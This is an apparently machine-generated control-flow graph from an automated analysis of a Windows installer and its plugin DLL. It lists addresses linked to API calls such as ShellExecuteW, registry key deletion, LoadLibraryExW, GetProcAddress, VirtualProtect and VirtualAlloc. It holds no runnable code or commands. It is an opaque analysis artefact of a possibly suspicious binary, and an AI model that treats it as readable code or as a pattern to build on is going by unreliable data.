CloseHandle 4588->4591 4589->4591 4590 406256 18 API calls 4590->4592 4591->4593 4594 4018e1 4591->4594 4592->4576 4592->4577 4592->4580 4592->4581 4592->4582 4592->4587 4592->4590 4601 405979 MessageBoxIndirectW 4592->4601 4603 405e09 GetFileAttributesW CreateFileW 4592->4603 4595 4018e6 4594->4595 4596 4018f9 4594->4596 4598 406256 18 API calls 4595->4598 4597 406256 18 API calls 4596->4597 4600 401901 4597->4600 4599 4018ee lstrcatW 4598->4599 4599->4600 4602 405979 MessageBoxIndirectW 4600->4602 4601->4592 4602->4593 4603->4592 4604->4572 4605->4571 4606 401b71 4607 401bc2 4606->4607 4609 401b7e 4606->4609 4610 401bc7 4607->4610 4611 401bec GlobalAlloc 4607->4611 4608 401c07 4613 406256 18 API calls 4608->4613 4621 4022f7 4608->4621 4609->4608 4616 401b95 4609->4616 4610->4621 4627 406234 lstrcpynW 4610->4627 4612 406256 18 API calls 4611->4612 4612->4608 4615 4022f1 4613->4615 4619 405979 MessageBoxIndirectW 4615->4619 4625 406234 lstrcpynW 4616->4625 4617 401bd9 GlobalFree 4617->4621 4619->4621 4620 401ba4 4626 406234 lstrcpynW 4620->4626 4623 401bb3 4628 406234 lstrcpynW 4623->4628 4625->4620 4626->4623 4627->4617 4628->4621 4984 401a72 4985 402c31 18 API calls 4984->4985 4986 401a78 4985->4986 4987 402c31 18 API calls 4986->4987 4988 401a20 4987->4988 4812 401573 4813 401583 ShowWindow 4812->4813 4814 40158c 4812->4814 4813->4814 4815 40159a ShowWindow 4814->4815 4816 402adb 4814->4816 4815->4816 4989 4014f5 SetForegroundWindow 4990 402adb 4989->4990 4991 100016b6 4992 100016e5 4991->4992 4993 10001b18 22 API calls 4992->4993 4994 100016ec 4993->4994 4995 100016f3 4994->4995 4996 100016ff 4994->4996 4997 10001272 2 API calls 4995->4997 4998 10001726 4996->4998 4999 10001709 4996->4999 5007 100016fd 4997->5007 5000 10001750 4998->5000 5001 1000172c 4998->5001 5002 1000153d 3 API calls 4999->5002 5004 1000153d 3 API calls 5000->5004 5003 100015b4 3 API calls 5001->5003 5005 1000170e 5002->5005 5006 10001731 5003->5006 5004->5007 5008 100015b4 3 API calls 5005->5008 5010 10001272 2 API calls 5006->5010 5009 10001714 5008->5009 5011 10001272 2 API calls 5009->5011 5012 10001737 GlobalFree 5010->5012 5013 1000171a GlobalFree 5011->5013 5012->5007 5014 1000174b GlobalFree 5012->5014 5013->5007 5014->5007 5015 401e77 5016 402c53 18 API calls 5015->5016 5017 401e7d 5016->5017 5018 402c53 18 API calls 5017->5018 5019 401e86 5018->5019 5020 402c53 18 API calls 5019->5020 5021 401e8f 5020->5021 5022 402c53 18 API calls 5021->5022 5023 401e98 5022->5023 5024 401423 25 API calls 5023->5024 5025 401e9f ShellExecuteW 5024->5025 5026 401ed0 5025->5026 5027 10002238 5028 10002296 5027->5028 5029 100022cc 5027->5029 5028->5029 5030 100022a8 GlobalAlloc 5028->5030 5030->5028 5031 40167b 5032 402c53 18 API calls 5031->5032 5033 401682 5032->5033 5034 402c53 18 API calls 5033->5034 5035 40168b 5034->5035 5036 402c53 18 API calls 5035->5036 5037 401694 MoveFileW 5036->5037 5038 4016a7 5037->5038 5044 4016a0 5037->5044 5039 402250 5038->5039 5041 406577 2 API calls 5038->5041 5040 401423 25 API calls 5040->5039 5042 4016b6 5041->5042 5042->5039 5043 4060d5 38 API calls 5042->5043 5043->5044 5044->5040 5045 1000103d 5046 1000101b 5 API calls 5045->5046 5047 10001056 5046->5047 4821 40287e 4822 402c53 18 API calls 4821->4822 4823 402885 FindFirstFileW 4822->4823 4824 402898 4823->4824 4825 4028ad 4823->4825 4826 4028b6 4825->4826 4829 40617b wsprintfW 4825->4829 4830 406234 lstrcpynW 4826->4830 4829->4826 4830->4824 5048 4019ff 5049 402c53 18 API calls 5048->5049 5050 401a06 5049->5050 5051 402c53 18 API calls 5050->5051 5052 401a0f 5051->5052 5053 401a16 lstrcmpiW 5052->5053 5054 401a28 lstrcmpW 5052->5054 5055 401a1c 5053->5055 5054->5055 5056 401000 5057 401037 BeginPaint GetClientRect 5056->5057 5058 40100c DefWindowProcW 5056->5058 5060 4010f3 5057->5060 5061 401179 5058->5061 5062 401073 CreateBrushIndirect FillRect DeleteObject 5060->5062 5063 4010fc 5060->5063 5062->5060 5064 401102 CreateFontIndirectW 5063->5064 5065 401167 EndPaint 5063->5065 5064->5065 5066 401112 6 API calls 5064->5066 5065->5061 5066->5065 5067 401503 5068 40150b 5067->5068 5070 40151e 5067->5070 5069 402c31 18 API calls 5068->5069 5069->5070 3939 402104 3940 402c53 18 API calls 3939->3940 3941 40210b 3940->3941 3942 402c53 18 API calls 3941->3942 3943 402115 3942->3943 3944 402c53 18 API calls 3943->3944 3945 40211f 3944->3945 3946 402c53 18 API calls 3945->3946 3947 402129 3946->3947 3948 402c53 18 API calls 3947->3948 3950 402133 3948->3950 3949 402172 CoCreateInstance 3954 402191 3949->3954 3950->3949 3951 402c53 18 API calls 3950->3951 3951->3949 3952 401423 25 API calls 3953 402250 3952->3953 3954->3952 3954->3953 3955 402805 3956 402a86 3955->3956 3957 40280c 3955->3957 3958 402c31 18 API calls 3957->3958 3959 402813 3958->3959 3960 402822 SetFilePointer 3959->3960 3960->3956 3961 402832 3960->3961 3963 40617b wsprintfW 3961->3963 3963->3956 3964 100027c7 3965 10002817 3964->3965 3966 100027d7 VirtualProtect 3964->3966 3966->3965 5071 405307 5072 405317 5071->5072 5073 40532b 5071->5073 5074 405374 5072->5074 5075 40531d 5072->5075 5076 405333 IsWindowVisible 5073->5076 5082 40534a 5073->5082 5077 405379 CallWindowProcW 5074->5077 5078 404344 SendMessageW 5075->5078 5076->5074 5079 405340 5076->5079 5080 405327 5077->5080 5078->5080 5084 404c5d SendMessageW 5079->5084 5082->5077 5089 404cdd 5082->5089 5085 404c80 GetMessagePos ScreenToClient SendMessageW 5084->5085 5086 404cbc SendMessageW 5084->5086 5087 404cb4 5085->5087 5088 404cb9 5085->5088 5086->5087 5087->5082 5088->5086 5098 406234 lstrcpynW 5089->5098 5091 404cf0 5099 40617b wsprintfW 5091->5099 5093 404cfa 5094 40140b 2 API calls 5093->5094 5095 404d03 5094->5095 5100 406234 lstrcpynW 5095->5100 5097 404d0a 5097->5074 5098->5091 5099->5093 5100->5097 3967 40230c 3968 402314 3967->3968 3969 40231a 3967->3969 3970 402c53 18 API calls 3968->3970 3971 402328 3969->3971 3973 402c53 18 API calls 3969->3973 3970->3969 3972 402336 3971->3972 3974 402c53 18 API calls 3971->3974 3975 402c53 18 API calls 3972->3975 3973->3971 3974->3972 3976 40233f WritePrivateProfileStringW 3975->3976 5101 40440c lstrcpynW lstrlenW 5102 40190c 5103 401943 5102->5103 5104 402c53 18 API calls 5103->5104 5105 401948 5104->5105 5106 405a25 69 API calls 5105->5106 5107 401951 5106->5107 5108 401f8c 5109 402c53 18 API calls 5108->5109 5110 401f93 5109->5110 5111 40660e 5 API calls 5110->5111 5112 401fa2 5111->5112 5113 402026 5112->5113 5114 401fbe GlobalAlloc 5112->5114 5114->5113 5115 401fd2 5114->5115 5116 40660e 5 API calls 5115->5116 5117 401fd9 5116->5117 5118 40660e 5 API calls 5117->5118 5119 401fe3 5118->5119 5119->5113 5123 40617b wsprintfW 5119->5123 5121 402018 5124 40617b wsprintfW 5121->5124 5123->5121 5124->5113 5125 40258c 5126 402c53 18 API calls 5125->5126 5127 402593 5126->5127 5130 405e09 GetFileAttributesW CreateFileW 5127->5130 5129 40259f 5130->5129 3984 40238e 3985 402393 3984->3985 3986 4023be 3984->3986 3996 402d5d 3985->3996 3988 402c53 18 API calls 3986->3988 3990 4023c5 3988->3990 3989 40239a 3991 4023a4 3989->3991 3995 4023db 3989->3995 4000 402c93 RegOpenKeyExW 3990->4000 3992 402c53 18 API calls 3991->3992 3993 4023ab RegDeleteValueW RegCloseKey 3992->3993 3993->3995 3997 402c53 18 API calls 3996->3997 3998 402d76 3997->3998 3999 402d84 RegOpenKeyExW 3998->3999 3999->3989 4001 402d27 4000->4001 4008 402cbe 4000->4008 4001->3995 4002 402ce4 RegEnumKeyW 4003 402cf6 RegCloseKey 4002->4003 4002->4008 4004 40660e 5 API calls 4003->4004 4007 402d06 4004->4007 4005 402d1b RegCloseKey 4010 402d0a 4005->4010 4006 402c93 5 API calls 4006->4008 4009 402d36 RegDeleteKeyW 4007->4009 4007->4010 4008->4002 4008->4003 4008->4005 4008->4006 4009->4010 4010->4001 5131 401d0e 5132 402c31 18 API calls 5131->5132 5133 401d15 5132->5133 5134 402c31 18 API calls 5133->5134 5135 401d21 GetDlgItem 5134->5135 5136 4025a8 5135->5136 5137 1000164f 5138 10001516 GlobalFree 5137->5138 5140 10001667 5138->5140 5139 100016ad GlobalFree 5140->5139 5141 10001682 5140->5141 5142 10001699 VirtualFree 5140->5142 5141->5139 5142->5139 5143 404d0f GetDlgItem GetDlgItem 5144 404d61 7 API calls 5143->5144 5186 404f7a 5143->5186 5145 404e04 DeleteObject 5144->5145 5146 404df7 SendMessageW 5144->5146 5147 404e0d 5145->5147 5146->5145 5148 404e44 5147->5148 5150 406256 18 API calls 5147->5150 5151 4042f8 19 API calls 5148->5151 5149 40510a 5153 405114 SendMessageW 5149->5153 5154 40511c 5149->5154 5155 404e26 SendMessageW SendMessageW 5150->5155 5156 404e58 5151->5156 5152 404f6d 5159 40435f 8 API calls 5152->5159 5153->5154 5166 405135 5154->5166 5167 40512e ImageList_Destroy 5154->5167 5171 405145 5154->5171 5155->5147 5157 4042f8 19 API calls 5156->5157 5175 404e66 5157->5175 5158 4050b7 SendMessageW 5158->5152 5163 4050cc SendMessageW 5158->5163 5164 405300 5159->5164 5160 405050 SendMessageW 5165 40505e 5160->5165 5161 404c5d 5 API calls 5174 404feb 5161->5174 5162 4052b4 5162->5152 5172 4052c6 ShowWindow GetDlgItem ShowWindow 5162->5172 5170 4050df 5163->5170 5165->5149 5165->5152 5165->5158 5168 40513e GlobalFree 5166->5168 5166->5171 5167->5166 5168->5171 5169 404f3b GetWindowLongW SetWindowLongW 5173 404f54 5169->5173 5180 4050f0 SendMessageW 5170->5180 5171->5162 5185 404cdd 4 API calls 5171->5185 5189 405180 5171->5189 5172->5152 5176 404f72 5173->5176 5177 404f5a ShowWindow 5173->5177 5174->5160 5174->5165 5175->5169 5179 404eb6 SendMessageW 5175->5179 5181 404f35 5175->5181 5183 404ef2 SendMessageW 5175->5183 5184 404f03 SendMessageW 5175->5184 5195 40432d SendMessageW 5176->5195 5194 40432d SendMessageW 5177->5194 5179->5175 5180->5149 5181->5169 5181->5173 5183->5175 5184->5175 5185->5189 5186->5161 5186->5165 5186->5174 5187 40528a InvalidateRect 5187->5162 5188 4052a0 5187->5188 5196 404c18 5188->5196 5190 4051ae SendMessageW 5189->5190 5191 4051c4 5189->5191 5190->5191 5191->5187 5193 405238 SendMessageW SendMessageW 5191->5193 5193->5191 5194->5152 5195->5186 5199 404b4f 5196->5199 5198 404c2d 5198->5162 5202 404b68 5199->5202 5200 406256 18 API calls 5201 404bcc 5200->5201 5203 406256 18 API calls 5201->5203 5202->5200 5204 404bd7 5203->5204 5205 406256 18 API calls 5204->5205 5206 404bed lstrlenW wsprintfW SetDlgItemTextW 5205->5206 5206->5198 5207 40190f 5208 402c53 18 API calls 5207->5208 5209 401916 5208->5209 5210 405979 MessageBoxIndirectW 5209->5210 5211 40191f 5210->5211 4011 402511 4012 402d5d 19 API calls 4011->4012 4013 40251b 4012->4013 4014 402c31 18 API calls 4013->4014 4015 402524 4014->4015 4016 402540 RegEnumKeyW 4015->4016 4017 40254c RegEnumValueW 4015->4017 4018 4028a1 4015->4018 4019 402565 RegCloseKey 4016->4019 4017->4018 4017->4019 4019->4018 5212 401491 5213 405393 25 API calls 5212->5213 5214 401498 5213->5214 5215 404793 5216 4047d0 5215->5216 5217 4047bf 5215->5217 5219 4047dc GetDlgItem 5216->5219 5225 40483b 5216->5225 5276 40595d GetDlgItemTextW 5217->5276 5221 4047f0 5219->5221 5220 4047ca 5223 4064c8 5 API calls 5220->5223 5224 404804 SetWindowTextW 5221->5224 5229 405c93 4 API calls 5221->5229 5222 40491f 5226 404ace 5222->5226 5278 40595d GetDlgItemTextW 5222->5278 5223->5216 5230 4042f8 19 API calls 5224->5230 5225->5222 5225->5226 5231 406256 18 API calls 5225->5231 5228 40435f 8 API calls 5226->5228 5233 404ae2 5228->5233 5234 4047fa 5229->5234 5235 404820 5230->5235 5236 4048af SHBrowseForFolderW 5231->5236 5232 40494f 5237 405cf0 18 API calls 5232->5237 5234->5224 5243 405be8 3 API calls 5234->5243 5238 4042f8 19 API calls 5235->5238 5236->5222 5239 4048c7 CoTaskMemFree 5236->5239 5240 404955 5237->5240 5241 40482e 5238->5241 5242 405be8 3 API calls 5239->5242 5279 406234 lstrcpynW 5240->5279 5277 40432d SendMessageW 5241->5277 5245 4048d4 5242->5245 5243->5224 5248 40490b SetDlgItemTextW 5245->5248 5252 406256 18 API calls 5245->5252 5247 404834 5250 40660e 5 API calls 5247->5250 5248->5222 5249 40496c 5251 40660e 5 API calls 5249->5251 5250->5225 5259 404973 5251->5259 5253 4048f3 lstrcmpiW 5252->5253 5253->5248 5256 404904 lstrcatW 5253->5256 5254 4049b4 5280 406234 lstrcpynW 5254->5280 5256->5248 5257 4049bb 5258 405c93 4 API calls 5257->5258 5260 4049c1 GetDiskFreeSpaceW 5258->5260 5259->5254 5263 405c34 2 API calls 5259->5263 5265 404a0c 5259->5265 5262 4049e5 MulDiv 5260->5262 5260->5265 5262->5265 5263->5259 5264 404a7d 5267 404aa0 5264->5267 5269 40140b 2 API calls 5264->5269 5265->5264 5266 404c18 21 API calls 5265->5266 5268 404a6a 5266->5268 5281 40431a KiUserCallbackDispatcher 5267->5281 5271 404a7f SetDlgItemTextW 5268->5271 5272 404a6f 5268->5272 5269->5267 5271->5264 5274 404b4f 21 API calls 5272->5274 5273 404abc 5273->5226 5282 404728 5273->5282 5274->5264 5276->5220 5277->5247 5278->5232 5279->5249 5280->5257 5281->5273 5283 404736 5282->5283 5284 40473b SendMessageW 5282->5284 5283->5284 5284->5226 5285 404495 5286 4044ad 5285->5286 5293 4045c7 5285->5293 5290 4042f8 19 API calls 5286->5290 5287 404631 5288 404703 5287->5288 5289 40463b GetDlgItem 5287->5289 5295 40435f 8 API calls 5288->5295 5291 4046c4 5289->5291 5292 404655 5289->5292 5294 404514 5290->5294 5291->5288 5300 4046d6 5291->5300 5292->5291 5299 40467b 6 API calls 5292->5299 5293->5287 5293->5288 5296 404602 GetDlgItem SendMessageW 5293->5296 5298 4042f8 19 API calls 5294->5298 5308 4046fe 5295->5308 5316 40431a KiUserCallbackDispatcher 5296->5316 5302 404521 CheckDlgButton 5298->5302 5299->5291 5303 4046ec 5300->5303 5304 4046dc SendMessageW 5300->5304 5301 40462c 5305 404728 SendMessageW 5301->5305 5314 40431a KiUserCallbackDispatcher 5302->5314 5307 4046f2 SendMessageW 5303->5307 5303->5308 5304->5303 5305->5287 5307->5308 5309 40453f GetDlgItem 5315 40432d SendMessageW 5309->5315 5311 404555 SendMessageW 5312 404572 GetSysColor 5311->5312 5313 40457b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5311->5313 5312->5313 5313->5308 5314->5309 5315->5311 5316->5301 5317 10001058 5319 10001074 5317->5319 5318 100010dd 5319->5318 5320 10001092 5319->5320 5321 10001516 GlobalFree 5319->5321 5322 10001516 GlobalFree 5320->5322 5321->5320 5323 100010a2 5322->5323 5324 100010b2 5323->5324 5325 100010a9 GlobalSize 5323->5325 5326 100010b6 GlobalAlloc 5324->5326 5327 100010c7 5324->5327 5325->5324 5328 1000153d 3 API calls 5326->5328 5329 100010d2 GlobalFree 5327->5329 5328->5327 5329->5318 5330 402d98 5331 402dc3 5330->5331 5332 402daa SetTimer 5330->5332 5333 402e11 5331->5333 5334 402e17 MulDiv 5331->5334 5332->5331 5335 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 5334->5335 5335->5333 4150 401c19 4151 402c31 18 API calls 4150->4151 4152 401c20 4151->4152 4153 402c31 18 API calls 4152->4153 4154 401c2d 4153->4154 4155 401c42 4154->4155 4156 402c53 18 API calls 4154->4156 4157 401c52 4155->4157 4160 402c53 18 API calls 4155->4160 4156->4155 4158 401ca9 4157->4158 4159 401c5d 4157->4159 4162 402c53 18 API calls 4158->4162 4161 402c31 18 API calls 4159->4161 4160->4157 4163 401c62 4161->4163 4164 401cae 4162->4164 4165 402c31 18 API calls 4163->4165 4166 402c53 18 API calls 4164->4166 4167 401c6e 4165->4167 4168 401cb7 FindWindowExW 4166->4168 4169 401c99 SendMessageW 4167->4169 4170 401c7b SendMessageTimeoutW 4167->4170 4171 401cd9 4168->4171 4169->4171 4170->4171 4182 40249d 4183 402d5d 19 API calls 4182->4183 4184 4024a7 4183->4184 4185 402c53 18 API calls 4184->4185 4186 4024b0 4185->4186 4187 4024bb RegQueryValueExW 4186->4187 4188 4028a1 4186->4188 4189 4024e1 RegCloseKey 4187->4189 4190 4024db 4187->4190 4189->4188 4190->4189 4193 40617b wsprintfW 4190->4193 4193->4189 5337 40149e 5338 4014ac PostQuitMessage 5337->5338 5339 4022f7 5337->5339 5338->5339 4194 403e20 4195 403f73 4194->4195 4196 403e38 4194->4196 4198 403f84 GetDlgItem GetDlgItem 4195->4198 4213 403fc4 4195->4213 4196->4195 4197 403e44 4196->4197 4199 403e62 4197->4199 4200 403e4f SetWindowPos 4197->4200 4201 4042f8 19 API calls 4198->4201 4204 403e67 ShowWindow 4199->4204 4205 403e7f 4199->4205 4200->4199 4206 403fae SetClassLongW 4201->4206 4202 40401e 4203 404344 SendMessageW 4202->4203 4208 403f6e 4202->4208 4232 404030 4203->4232 4204->4205 4209 403ea1 4205->4209 4210 403e87 DestroyWindow 4205->4210 4211 40140b 2 API calls 4206->4211 4207 401389 2 API calls 4216 403ff6 4207->4216 4214 403ea6 SetWindowLongW 4209->4214 4215 403eb7 4209->4215 4212 404281 4210->4212 4211->4213 4212->4208 4225 4042b2 ShowWindow 4212->4225 4213->4202 4213->4207 4214->4208 4217 403f60 4215->4217 4218 403ec3 GetDlgItem 4215->4218 4216->4202 4219 403ffa SendMessageW 4216->4219 4224 40435f 8 API calls 4217->4224 4222 403ef3 4218->4222 4223 403ed6 SendMessageW IsWindowEnabled 4218->4223 4219->4208 4220 40140b 2 API calls 4220->4232 4221 404283 DestroyWindow EndDialog 4221->4212 4227 403f00 4222->4227 4229 403f47 SendMessageW 4222->4229 4230 403f13 4222->4230 4239 403ef8 4222->4239 4223->4208 4223->4222 4224->4208 4225->4208 4226 406256 18 API calls 4226->4232 4227->4229 4227->4239 4228 4042d1 SendMessageW 4231 403f2e 4228->4231 4229->4217 4233 403f30 4230->4233 4234 403f1b 4230->4234 4231->4217 4232->4208 4232->4220 4232->4221 4232->4226 4235 4042f8 19 API calls 4232->4235 4240 4042f8 19 API calls 4232->4240 4255 4041c3 DestroyWindow 4232->4255 4236 40140b 2 API calls 4233->4236 4267 40140b 4234->4267 4235->4232 4238 403f37 4236->4238 4238->4217 4238->4239 4239->4228 4241 4040ab GetDlgItem 4240->4241 4242 4040c0 4241->4242 4243 4040c8 ShowWindow KiUserCallbackDispatcher 4241->4243 4242->4243 4264 40431a KiUserCallbackDispatcher 4243->4264 4245 4040f2 EnableWindow 4248 404106 4245->4248 4246 40410b GetSystemMenu EnableMenuItem SendMessageW 4247 40413b SendMessageW 4246->4247 4246->4248 4247->4248 4248->4246 4265 40432d SendMessageW 4248->4265 4266 406234 lstrcpynW 4248->4266 4251 404169 lstrlenW 4252 406256 18 API calls 4251->4252 4253 40417f SetWindowTextW 4252->4253 4254 401389 2 API calls 4253->4254 4254->4232 4255->4212 4256 4041dd CreateDialogParamW 4255->4256 4256->4212 4257 404210 4256->4257 4258 4042f8 19 API calls 4257->4258 4259 40421b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4258->4259 4260 401389 2 API calls 4259->4260 4261 404261 4260->4261 4261->4208 4262 404269 ShowWindow 4261->4262 4263 404344 SendMessageW 4262->4263 4263->4212 4264->4245 4265->4248 4266->4251 4268 401389 2 API calls 4267->4268 4269 401420 4268->4269 4269->4239 5340 100010e1 5349 10001111 5340->5349 5341 100011d8 GlobalFree 5342 100012ba 2 API calls 5342->5349 5343 100011d3 5343->5341 5344 100011f8 GlobalFree 5344->5349 5345 10001272 2 API calls 5348 100011c4 GlobalFree 5345->5348 5346 10001164 GlobalAlloc 5346->5349 5347 100012e1 lstrcpyW 5347->5349 5348->5349 5349->5341 5349->5342 5349->5343 5349->5344 5349->5345 5349->5346 5349->5347 5349->5348 4270 4015a3 4271 402c53 18 API calls 4270->4271 4272 4015aa SetFileAttributesW 4271->4272 4273 4015bc 4272->4273 5350 4025ae 5351 4025c2 5350->5351 5352 4025dd 5350->5352 5353 402c31 18 API calls 5351->5353 5354 402611 5352->5354 5355 4025e2 5352->5355 5362 4025c9 5353->5362 5356 402c53 18 API calls 5354->5356 5357 402c53 18 API calls 5355->5357 5358 402618 lstrlenW 5356->5358 5359 4025e9 WideCharToMultiByte lstrlenA 5357->5359 5358->5362 5359->5362 5360 402645 5361 40265b 5360->5361 5363 405ebb WriteFile 5360->5363 5362->5360 5362->5361 5365 405eea SetFilePointer 5362->5365 5363->5361 5366 405f06 5365->5366 5371 405f22 5365->5371 5367 405e8c ReadFile 5366->5367 5370 405f12 5367->5370 5368 405f53 SetFilePointer 5368->5371 5369 405f2b SetFilePointer 5369->5368 5372 405f36 5369->5372 5370->5368 5370->5369 5370->5371 5371->5360 5373 405ebb WriteFile 5372->5373 5373->5371 5374 401a30 5375 402c53 18 API calls 5374->5375 5376 401a39 ExpandEnvironmentStringsW 5375->5376 5377 401a4d 5376->5377 5379 401a60 5376->5379 5378 401a52 lstrcmpW 5377->5378 5377->5379 5378->5379 4629 402032 4630 402044 4629->4630 4631 4020f6 4629->4631 4632 402c53 18 API calls 4630->4632 4633 401423 25 API calls 4631->4633 4634 40204b 4632->4634 4640 402250 4633->4640 4635 402c53 18 API calls 4634->4635 4636 402054 4635->4636 4637 40206a LoadLibraryExW 4636->4637 4638 40205c GetModuleHandleW 4636->4638 4637->4631 4639 40207b 4637->4639 4638->4637 4638->4639 4652 40667d WideCharToMultiByte 4639->4652 4643 4020c5 4645 405393 25 API calls 4643->4645 4644 40208c 4646 402094 4644->4646 4647 4020ab 4644->4647 4648 40209c 4645->4648 4649 401423 25 API calls 4646->4649 4655 10001759 4647->4655 4648->4640 4650 4020e8 FreeLibrary 4648->4650 4649->4648 4650->4640 4653 4066a7 GetProcAddress 4652->4653 4654 402086 4652->4654 4653->4654 4654->4643 4654->4644 4656 10001789 4655->4656 4697 10001b18 4656->4697 4658 10001790 4659 100018a6 4658->4659 4660 100017a1 4658->4660 4661 100017a8 4658->4661 4659->4648 4746 10002286 4660->4746 4729 100022d0 4661->4729 4666 1000180c 4670 10001812 4666->4670 4671 1000184e 4666->4671 4667 100017ee 4759 100024a9 4667->4759 4668 100017d7 4681 100017cd 4668->4681 4756 10002b5f 4668->4756 4669 100017be 4673 100017c4 4669->4673 4674 100017cf 4669->4674 4676 100015b4 3 API calls 4670->4676 4678 100024a9 10 API calls 4671->4678 4673->4681 4740 100028a4 4673->4740 4750 10002645 4674->4750 4683 10001828 4676->4683 4684 10001840 4678->4684 4679 100017f4 4770 100015b4 4679->4770 4681->4666 4681->4667 4687 100024a9 10 API calls 4683->4687 4696 10001895 4684->4696 4781 1000246c 4684->4781 4686 100017d5 4686->4681 4687->4684 4690 1000189f GlobalFree 4690->4659 4693 10001881 4693->4696 4785 1000153d wsprintfW 4693->4785 4694 1000187a FreeLibrary 4694->4693 4696->4659 4696->4690 4788 1000121b GlobalAlloc 4697->4788 4699 10001b3c 4789 1000121b GlobalAlloc 4699->4789 4701 10001d7a GlobalFree GlobalFree GlobalFree 4702 10001d97 4701->4702 4720 10001de1 4701->4720 4703 100020ee 4702->4703 4710 10001dac 4702->4710 4702->4720 4705 10002110 GetModuleHandleW 4703->4705 4703->4720 4704 10001c1d GlobalAlloc 4722 10001b47 4704->4722 4708 10002121 LoadLibraryW 4705->4708 4709 10002136 4705->4709 4706 10001c68 lstrcpyW 4711 10001c72 lstrcpyW 4706->4711 4707 10001c86 GlobalFree 4707->4722 4708->4709 4708->4720 4796 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4709->4796 4710->4720 4792 1000122c 4710->4792 4711->4722 4713 10002188 4714 10002195 lstrlenW 4713->4714 4713->4720 4797 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4714->4797 4716 10002148 4716->4713 4728 10002172 GetProcAddress 4716->4728 4718 10002048 4718->4720 4723 10002090 lstrcpyW 4718->4723 4720->4658 4721 100021af 4721->4720 4722->4701 4722->4704 4722->4706 4722->4707 4722->4711 4722->4718 4722->4720 4724 10001cc4 4722->4724 4725 10001f37 GlobalFree 4722->4725 4727 1000122c 2 API calls 4722->4727 4795 1000121b GlobalAlloc 4722->4795 4723->4720 4724->4722 4790 1000158f GlobalSize GlobalAlloc 4724->4790 4725->4722 4727->4722 4728->4713 4731 100022e8 4729->4731 4730 1000122c GlobalAlloc lstrcpynW 4730->4731 4731->4730 4733 10002415 GlobalFree 4731->4733 4735 100023d3 lstrlenW 4731->4735 4736 100023ba GlobalAlloc CLSIDFromString 4731->4736 4737 1000238f GlobalAlloc WideCharToMultiByte 4731->4737 4799 100012ba 4731->4799 4733->4731 4734 100017ae 4733->4734 4734->4668 4734->4669 4734->4681 4735->4733 4739 100023de 4735->4739 4736->4733 4737->4733 4739->4733 4803 100025d9 4739->4803 4742 100028b6 4740->4742 4741 1000295b CreateFileA 4743 10002979 4741->4743 4742->4741 4744 10002a75 4743->4744 4745 10002a6a GetLastError 4743->4745 4744->4681 4745->4744 4747 10002296 4746->4747 4748 100017a7 4746->4748 4747->4748 4749 100022a8 GlobalAlloc 4747->4749 4748->4661 4749->4747 4754 10002661 4750->4754 4751 100026b2 GlobalAlloc 4755 100026d4 4751->4755 4752 100026c5 4753 100026ca GlobalSize 4752->4753 4752->4755 4753->4755 4754->4751 4754->4752 4755->4686 4757 10002b6a 4756->4757 4758 10002baa GlobalFree 4757->4758 4806 1000121b GlobalAlloc 4759->4806 4761 10002530 StringFromGUID2 4766 100024b3 4761->4766 4762 10002541 lstrcpynW 4762->4766 4763 1000250b MultiByteToWideChar 4763->4766 4764 10002554 wsprintfW 4764->4766 4765 10002571 GlobalFree 4765->4766 4766->4761 4766->4762 4766->4763 4766->4764 4766->4765 4767 100025ac GlobalFree 4766->4767 4768 10001272 2 API calls 4766->4768 4807 100012e1 4766->4807 4767->4679 4768->4766 4811 1000121b GlobalAlloc 4770->4811 4772 100015ba 4773 100015c7 lstrcpyW 4772->4773 4775 100015e1 4772->4775 4776 100015fb 4773->4776 4775->4776 4777 100015e6 wsprintfW 4775->4777 4778 10001272 4776->4778 4777->4776 4779 100012b5 GlobalFree 4778->4779 4780 1000127b GlobalAlloc lstrcpynW 4778->4780 4779->4684 4780->4779 4782 10001861 4781->4782 4783 1000247a 4781->4783 4782->4693 4782->4694 4783->4782 4784 10002496 GlobalFree 4783->4784 4784->4783 4786 10001272 2 API calls 4785->4786 4787 1000155e 4786->4787 4787->4696 4788->4699 4789->4722 4791 100015ad 4790->4791 4791->4724 4798 1000121b GlobalAlloc 4792->4798 4794 1000123b lstrcpynW 4794->4720 4795->4722 4796->4716 4797->4721 4798->4794 4800 100012c1 4799->4800 4801 1000122c 2 API calls 4800->4801 4802 100012df 4801->4802 4802->4731 4804 100025e7 VirtualAlloc 4803->4804 4805 1000263d 4803->4805 4804->4805 4805->4739 4806->4766 4808 100012ea 4807->4808 4809 1000130c 4807->4809 4808->4809 4810 100012f0 lstrcpyW 4808->4810 4809->4766 4810->4809 4811->4772 5385 401d33 5386 402c31 18 API calls 5385->5386 5387 401d44 SetWindowLongW 5386->5387 5388 402adb 5387->5388 5389 401db3 GetDC 5390 402c31 18 API calls 5389->5390 5391 401dc5 GetDeviceCaps MulDiv ReleaseDC 5390->5391 5392 402c31 18 API calls 5391->5392 5393 401df6 5392->5393 5394 406256 18 API calls 5393->5394 5395 401e33 CreateFontIndirectW 5394->5395 5396 4025a8 5395->5396 4817 401735 4818 402c53 18 API calls 4817->4818 4819 40173c SearchPathW 4818->4819 4820 401757 4819->4820 5397 402ab6 SendMessageW 5398 402ad0 InvalidateRect 5397->5398 5399 402adb 5397->5399 5398->5399 5400 402837 5401 40283d 5400->5401 5402 402845 FindClose 5401->5402 5403 402adb 5401->5403 5402->5403 5404 4014b8 5405 4014be 5404->5405 5406 401389 2 API calls 5405->5406 5407 4014c6 5406->5407 5408 403a3b 5409 403a46 5408->5409 5410 403a4d GlobalAlloc 5409->5410 5411 403a4a 5409->5411 5410->5411 5412 10002a7f 5413 10002a97 5412->5413 5414 1000158f 2 API calls 5413->5414 5415 10002ab2 5414->5415

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
